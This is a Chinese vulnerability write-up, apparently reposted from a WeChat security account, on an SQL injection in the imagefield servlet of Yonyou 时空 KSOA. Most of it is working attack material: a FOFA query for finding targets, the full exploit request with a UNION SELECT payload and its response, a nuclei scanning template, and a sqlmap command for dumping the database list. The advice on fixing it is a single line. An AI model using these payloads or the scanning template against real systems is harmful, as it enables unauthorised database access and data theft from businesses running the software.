免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
用友-时空KSOA SQL注入漏洞
02
—
漏洞影响
用友时空企业信息融通平台KSOA v9.0及以下版本
03
—
漏洞描述
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
该平台imagefield接口处存在SQL注入漏洞,会导致数据泄露。
04
—
app="用友-时空KSOA"
05
—
漏洞复现
向靶场发送数据包
GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
响应数据包如下
HTTP/1.1 200 OK
Connection: close
Content-Type: image/jpeg
Date: Mon, 23 Oct 2023 11:41:43 GMT
Server: Apache-Coyote/1.1
0x098f6bcd4621d373cade4e832627b4f6
证明存在漏洞
06
—
nuclei poc
poc文件内容如下
id: yonyou-ksoa-imagefield-sqli
info:
name: 用友-时空KSOA SQL注入漏洞
author: fgz
severity: high
description: |
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。该平台imagefield接口处存在SQL注入漏洞,会导致数据泄露。
reference:
none
metadata:
app="用友-时空KSOA" :
veified: true
tags: sqli,yonyou,ksoa
http:
method: GET
path:
"{{BaseURL}}/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+"
and :
matchers:
type: status
status:
200
type: word
part: body
words:
'0x098f6bcd4621d373cade4e832627b4f6'
condition: and
运行POC
.nuclei.exe -t .yonyou-ksoa-imagefield-sqli.yaml -u http://x.x.x.x:xx
07
—
sqlmap一键梭哈
使用sqlmap查看数据库列表
sqlmap -u "http://x.x.x.x/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=*" --dbs
08
—
漏洞修复
官方已发布布丁。
原文始发于微信公众号(AI与网安):用友-时空KSOA SQL注入漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论